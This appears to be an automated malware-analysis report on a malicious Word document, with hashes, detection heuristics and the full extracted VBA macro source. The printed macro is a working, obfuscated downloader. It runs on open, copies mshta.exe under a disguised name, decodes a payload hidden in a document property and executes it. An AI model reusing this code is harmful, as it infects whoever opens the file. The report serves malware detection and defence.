Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bc166917c1dfacb5…

MALICIOUS

Office (OOXML)

103.3 KB Created: 2020-11-18 19:46:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-11-23
MD5: cadc698a68b06e1418e449f19ab4ae6a SHA-1: fd004c9b67c0743da808116b485a4d2f2128a9b7 SHA-256: bc166917c1dfacb585a549964621c44502c6994f71749822563b0d0916a4ce2b
138 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Call CreateObject("ws" + aoWg0 + "ell").run(ao07zL)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    ahY5Wv = Environ(aKf26N)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13138 bytes
SHA-256: 43f2de4afbefa34446fe3fd0de895f9372b7a99106a8893613f3cf956551f76c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aWS0r3"
Sub AutoOpen()
aaNP7
End Sub

Attribute VB_Name = "aSYaq"
Public Const aqDPk As String = ""
Public Const a8WQB As Integer = -1804 + 1817
Public Const a9xAp As String = "1ridn1iw1"
Public Const apUkE As String = "231met1sys1"
Public Const aAQm6 As String = "p1m1e1t"
Public Const aoWg0 As String = "cript.sh"
Function aHr3Lx()
' Grandchild benign to
' Functioning cucumber unpremeditated
' Symbolism
' Herbs palette
' Vocals amend licenses hectic
' Blatant karen chi organisms
' Subdivision
' Outdoors overcrowded
' Jolt specially if unconstitutional passport credible
' Holocaust sooty riverside estonia distinct bowler
End Function
Sub aZdRM(a3Igj)
' Create outlaw nose
' Judaism arid
' Everyone colloquy provincial cnet
' Yes
' Posters sanctified builder whack
' Agency packages compendium potassium
' Conducting sheaf flexible
' Forty-nine file snowboard lithe accuses
' Audience
' Sol considers polish
' Harlem pieces neighborhood constituting
' Welding biological brooch
' Agreed sectors nevada Word
' Bay rent atom healer pickle
' Promotional pedant forty-four obeisance daze ec gerald
' Begat dollars qatar physiognomy belize
' Lakes twist wetted
' Astringent prep englishwoman jeopardy
' Appliances thirty-eight pence
' Mosaic sixty-eight institutional ukraine
' Honduras
' Aggrandizement ng manually
' Cosmopolitan
' Humanities knives congratulation sections notebook
' Emit pest
' Por tacit pastime celebs
' Adjustment molest variables
' Jim voice
' Fermented directory misrule mobility
' Quaff welled mg disc
' Miss puncture contrast deep-rooted
' Humanities bon
' Dairy sublimate shorn britney
' Encore universality debt
' React tusk bull really swarthy positioning
' Undergraduate trivia bigot
' Tombstone madagascar
' Gypsy rotation deadened
' Wards mixer inflammable burdensome
' Sparc annex pain grope ambien topaz
' Ran halter superman animal croquet
' Omissions slash
' Maritime bakery nether
' Aden maiden donation
' Contraction andrea forty-three
' Get possibilities
' Tighten tabs
' Murphy lan
' Edgar
' Polymer corsican dissemble windlass
' Plates inquisitor interest ablaze rubicon homily
' Ahead tic advancement processors province circlet parochial
' Meanwhile socialism minnesota
' Murky road teachers dk
' Chef annexation gripping
' Inimitable paternity discovers inbox
' Ezra pl
End Sub
Function aLyRW(aSK4OD)
aLyRW = ActiveDocument.BuiltInDocumentProperties(aSK4OD)
End Function
Public Sub akvjw()
' Unwell save alike
' Deadening
' Be- processes diane algorithms
' Jet correctly ascendancy sid dna
' Model actress doze secrets discordant acquirement
' Welling thumbzilla diluted gloves minimize
' Presbytery fob script
' Insight dissuade
' Tuneful cup waves
' Arcadian cigarettes
' Outstanding airing
aTi2FV
End Sub
Public Sub aEzSX()
a6CpFn
End Sub

Attribute VB_Name = "a3BuWI"
Public Function ax3MA1(azWlk, aqEIu)
' End era nickname pelf jenny
' Proceed ceres airline abusing conjuncture
' Sneeze nude
' Pawn hash accessibility circumcised slake
' Regions utc guardian
' Widen tormentor conversant pastor bucks prometheus
' Pink stack verandah issues unification
' Rome molecular seaboard fox stingy
' Op. wishlist
' Preservation canvas comedian harrison
' Haiti inventive harm visa
' Corner poet
' Darn sci father
' Hose switching animate
' Affluent farmers vacuum
' Bernard
' Wales creak modeling absurdly
' Gasoline cad surge
' Lets conventual surfing sheer
' Brewer mercy admit largely
' Critical lustrous satiate
' Roller apprise
' Admissions crazy glacial teas
' Mandolin puerile symmetry psychology
' Provide cotton upbraid tones sardinian players
' Success hives brescia
FileNumber = FreeFile
Open azWlk For Output As #FileNumber
' Material gd propaganda claire
' Recluse undaunted tops administered gave mazda
' Dover incapacity
' Overflow hub flash
' Lawfully dictum
' Single motivation silesia
' Jos.
' Tug banking threat fresco
' Mug cancel
' Flimsy spiral sunshine bunny
' Magazines betrayer delectation sorcerer
Print #FileNumber, aqEIu
Close #FileNumber
End Function
Sub a87n6(a9fmxc, a4pS0)
' Night detective para
' Affiliate cynic acquiesce presidents
' Brings
' Ec opposition
' Elucidate alloy johannesburg berlin
' Loan exams
' Lavender travelers berne
' Lymph urls lil jubilee
' Seeds deg efficacious
' Optimistic
' They toothed
' Decades
' Zeke shares lucy pun
' Replaced fun colossus penury batman
' Pox litigation qualified
' Local hock ultram
' Halves spinach conservation
' Bloody supervise statute isa.
' Understand
' Symphony productivity retrospect
' Cropping clyde
' Postulate michigan elements
' Illimitable sucker
' Thoroughbred
' Itinerary esthetic
' Bachelor
' Civilian northeast despot
' Bt crusty
' Gross styles comedy new
' Certain bel intertwined non-commissioned burmese bibliography
' Hewlett braces regulated
' Continuously pavia
' Plow dir fascinating haiti morocco whet
' Carriers william economically costa
FileCopy a9fmxc, a4pS0
End Sub
Function axUtlz(aavX4)
' Scribble excess customize studied proceedings custom
axUtlz = aavX4
End Function
Function a6OR1(aavX4) As String
Dim av5QKE As Long
Dim ak861 As Integer
Dim a9HepW As Integer
For av5QKE = 1 To Len(aavX4)
' Army appointments fake legislator
' For requisition spherical turbulence
' Enact thongs flog
' Damages crumbled continuity strawberry
' Boating
' Marina clock
' Accomplished stave
' Breeder chick
' Midway lean rivet
' Resumes fy futures
' Participating thongs brunswick scraggy
a9HepW = 0
ajzAa = Mid(aavX4, av5QKE, 1)
' Secretion shrub zoological commission tribune inspections
ak861 = Asc(ajzAa)
If (ak861 > aMxW0q(29093 / 29093) And ak861 < aMxW0q(-2301 + 2303)) Or (ak861 > aMxW0q(4574 - 4571) And ak861 < aMxW0q(1431 - 1427)) Then
a9HepW = a8WQB
ak861 = aFWA5G(ak861, a9HepW)
' Disorderly
' Undersigned aperture relevance
' Jackal flout autobiography idol tolerate sentences
' Slight abaft pupils ratification
' Compunction
' Primacy
' Wild outdoors
' Mr
' Yields watershed
' Laser sur special tries
If ak861 < aMxW0q(5) And ak861 > 83 Then
ak861 = aQYdcB(ak861)
ElseIf ak861 < 5655 / 87 Then
ak861 = aQYdcB(ak861)
End If
End If
' Translucent dirty bastard pulling humid
auYtHB = azw6S(ak861)
' Disruption fetish renew cull
Mid$(aavX4, av5QKE, 1) = axUtlz(auYtHB)
Next av5QKE
a6OR1 = aavX4
End Function

Attribute VB_Name = "aSQFt"
Function ag3ByP(adPHF)
' Pointed
akNac4 = adPHF
aIRf3i = Len(akNac4)
For aQYzm = 0 To aIRf3i - 1
a27i1T = a27i1T & Mid(akNac4, (aIRf3i - aQYzm), 1)
Next aQYzm
' Canvas covers discretionary hearts
' Needed overflow
' Ot lattice needs
' Base magnanimity asbestos
' Whereas tweed celibacy join charged immune
' Subway preparation sci burlesque
' Slut chine hayes narrate ed
' Inscrutable whove
' Cravat recovery critical tracks amenable
' Wikipedia woo scholastic
' Praiseworthy samoa
ag3ByP = a27i1T
End Function
Public Function am7UDW(aYRNwT)
' Find harley abasement
' Standing cull statement knowing appliances
' Ensures seduction
' Restore pus
' Diurnal
' Sandal emma baffle
' Quorum demonstrates optics
' Surrounding kathy phoenicia width
' Psyche lather depend illegally
' Adhesion orleans
' Fireplace sluggard dale
am7UDW = Replace(aYRNwT, aqDPk, "")
End Function
Sub aaNP7()
' Ilk stayed
' Quarter biology
' Corporation bra ga vs
' Crash formatting queue harmed explode
' Jj
' Accords tri reek theater homicide
' Pulse jennifer
' Vibrator disobey praiseworthy leading revisions
' Printable execrable probate
' Yuan herbs communication armenia succor
' Beryl dishonesty
akvjw
' Karl petrograd lobster thaw commensurate
aEzSX
' Happening revoke outdoors delirious
' Bloggers
' Retro recipe timing replied
' Brought raw flexible voters radium
' Sphinx wreckage brackish
' Vitiated wrapped opinions classroom mitsubishi
' Actress immune reliance oust
' Rear accomplishes open-mouthed
' Cruz amino
' Baseness
' Please
Call CreateObject("ws" + aoWg0 + "ell").run(ao07zL)
End Sub

Attribute VB_Name = "a5ke6i"
Function ahY5Wv(aKf26N)
ahY5Wv = Environ(aKf26N)
End Function
Function adpie()
' Significant troubadour
' Pokemon buckskin photographic
' Bight ebony
' Hell grid
' Ghz abdicated armistice grieving ge
' Pentecost teens oops
' Advertiser sapphire antidote
' Demise instrumentation debase sheath
' Gains modem bandwidth leicestershire rewritten
' During detector acetylene justin
' Ornate collaboration graft sacred buyers
With Application
adpie = .PathSeparator
End With
End Function
Function aBf7gM(aCIX7)
aknBD = VBA.Split(ag3ByP("lmth.ni|moc.ni|exe.athsm"), "|")
' Jeremy smith shant mammoth incautious
' Roped triton pix
' Protestant tricky
' Psalm unchallenged ment az
' Stratum chapters safari bravado rx
' Arm armament healthcare quarter moodily generated
' Metropolitan
' Discrepancy fiber pf seedling boding
' Cute phial sicken pork tried
' Fx attempting clusters reel
' Coroner
' Won ammonia sold
' Bargains lesson
' Peeps pulp cruises
' Canvas ag
' Teen psi end accommodated
' Enclose cognizant workforce
' Capitulate affiliates refund emphasis
' Dot adidas marl indivisible warrant
' Flap
' Ebooks
' Self-evident jd
' Preferment belligerent street
' Treatments auctions priority
' Playstation fie one-sided
' Inopportune endorsement moth lama initially earned
' Broadest ninety-six jointed schism
' Eucalyptus insides equivalent
' Heather
' Smirk cheat ever accosted album dialectic
' Consoles wolf
' Folklore pacify confronts quail seedy
' Improvement ferrara dumbfounded receivers bay uncanny joyously
' Geographical miscreant engrave
' Applications
' Fancy horoscope
' Mush refresh nipples viewer
' Appropriateness frankfurt interment admin eruption
' Brazilian
' Memories
' Clothing can nevada
' Jostle academy auction
' Hart ya
Select Case aCIX7
' Balance rings tutelary
Case 0:
aBf7gM = ahY5Wv(Replace(ag3ByP(a9xAp), "1", "")) & adpie & Replace(ag3ByP(apUkE), "1", "") & adpie & aknBD(0)
Case 1:
' Admonish pmid focal ajax
aBf7gM = ahY5Wv(Replace(ag3ByP(aAQm6), "1", "")) & adpie & aknBD(1)
Case 2:
' Publicity clear fwd satyr footprint
aBf7gM = ahY5Wv(Replace(ag3ByP(aAQm6), "1", "")) & adpie & aknBD(2)
End Select
End Function
Sub a6CpFn()
apBfx = aAnig(aBf7gM(2))
ax3MA1 apBfx, a6OR1(aLyRW("category"))
End Sub

Attribute VB_Name = "axANo"
Function aR24kl(aVwnIt)
' Discount
' Escutcheon housewares scoop observe
' Endearing insecurity possibility
' Elm atrium win information marl milton
' Thracian registered garbage insured
' What tests licentiousness instructions maria equation
' Successful
' Clocks
' Diver institutes upskirt
' Annihilation designing barcelona struggle crammed die
' Unfold postcards deeply
' Acquirement magnanimously est rings loon
aR24kl = (am7UDW(aVwnIt))
End Function
Function amraT(anLoWJ)
' Dial debtor chamois
' Costa florist
' Myth stud dock
' Www
' Safer breakfast super
' Kent incidentally incongruity
' El vertex
' Madeira login
' Ventricle baths clip subject-matter
' Relaxation distributor gourd reducing
' Syndrome riband ledger newman
amraT = (am7UDW(anLoWJ))
End Function
Function aAnig(aL1gr)
' Tryst squalid
' Boor projects
' Foreground cunt wright sh leicestershire adulterous baleful
' Travel catalogs
' Indicated billow characterized derived
' Returned specifies correlation
' Insolvent harry strict raven
' Manipulation cassock rear
' Cambridge fragrances cold-blooded
' Accessibility
' Completing useful feet
' Firefox instance
' Mu fluently sealskin possible trans
' Overdone geological victoria footnote
' Ellipse cramps impropriety
' Stomach
' Multiple potash forte
' Intestine poplar yr manger
' Violent verzeichnis martinique
' Crabs sniff fabled realistic
' Fulfill invention hampton
' Knoll herbaceous steve
aAnig = (am7UDW(aL1gr))
End Function
Function ao07zL()
azhHv = amraT(aBf7gM(1))
a8JYM = aAnig(aBf7gM(2))
ao07zL = azhHv & " " & a8JYM
End Function

Attribute VB_Name = "aTRMGv"
Sub aTi2FV()
adwHqc = aR24kl(aBf7gM(0))
aLw4T = amraT(aBf7gM(1))
a87n6 adwHqc, aLw4T
End Sub
Function aQYdcB(afIGKQ)
aQYdcB = afIGKQ + 1285 - 1259
End Function
Function aMxW0q(aoZuP)
If aoZuP = 0 Then
aMxW0q = 25105 - 25104
ElseIf aoZuP = 1 Then
aMxW0q = 7808 / 122
ElseIf aoZuP = 2 Then
aMxW0q = 437 - 346
ElseIf aoZuP = 3 Then
aMxW0q = -79 + 175
ElseIf aoZuP = 4 Then
aMxW0q = -33 + 156
ElseIf aoZuP = 5 Then
aMxW0q = -241 + 338
Else
aMxW0q = 1012 + 12
End If
End Function
Function aFWA5G(afIGKQ, avWiSh)
aFWA5G = afIGKQ - avWiSh
End Function
Function azw6S(afIGKQ)
azw6S = VBA.ChrW(afIGKQ)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 53248 bytes
SHA-256: 72c9aa036d5bc982fb5dcda8a76a4e84293dd2873e553fdce3e1dd13854cbfec